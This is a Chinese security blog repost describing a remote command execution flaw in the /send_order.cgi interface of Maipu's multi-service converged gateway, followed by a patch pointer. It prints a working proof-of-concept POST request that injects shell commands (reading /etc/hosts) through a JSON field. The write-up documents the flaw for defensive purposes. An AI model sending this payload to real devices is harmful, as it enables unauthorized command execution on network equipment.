迈普多业务融合网关远程命令执行漏洞

admin 2024年6月26日16:28:55评论24 views字数 685阅读2分17秒阅读模式
0x01漏洞介绍
迈普通信技术股份有限公司成立于1993年,是国内领先的网络产品及解决方案供应商。

迈普多业务融合网关拥有融合网关功能、精准流控、上网行为管理、智能选路…等强大功能,并支持对接迈普云平台,实现远程运维和集中管理,很好的满足了医疗/教育等场景要求的全面一体化的网络需求。其接口/send_order.cgi存在远程命令执行漏洞,攻击者可通过该漏洞获取系统权限。

0x02影响版本

迈普多业务融合网关

0x03漏洞复现

1.访问漏洞环境

迈普多业务融合网关远程命令执行漏洞

2.对漏洞进行复现

POC (POST)

漏洞复现

POST /send_order.cgi?parameter=operation HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 67{"opid":"1","name":";echo -n klmns:;cat /etc/hosts;","type":"rest"}

测试cat /etc/hosts命令执行成功

迈普多业务融合网关远程命令执行漏洞

3.Yakit工具加载nuclei文件测试(漏洞存在)

迈普多业务融合网关远程命令执行漏洞

迈普多业务融合网关远程命令执行漏洞
0x04修复建议
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

http://www.maipu.cn/

 

 

原文始发于微信公众号(阿乐你好):【成功复现】迈普多业务融合网关远程命令执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月26日16:28:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   迈普多业务融合网关远程命令执行漏洞https://cn-sec.com/archives/2887026.html

发表评论

匿名网友 填写信息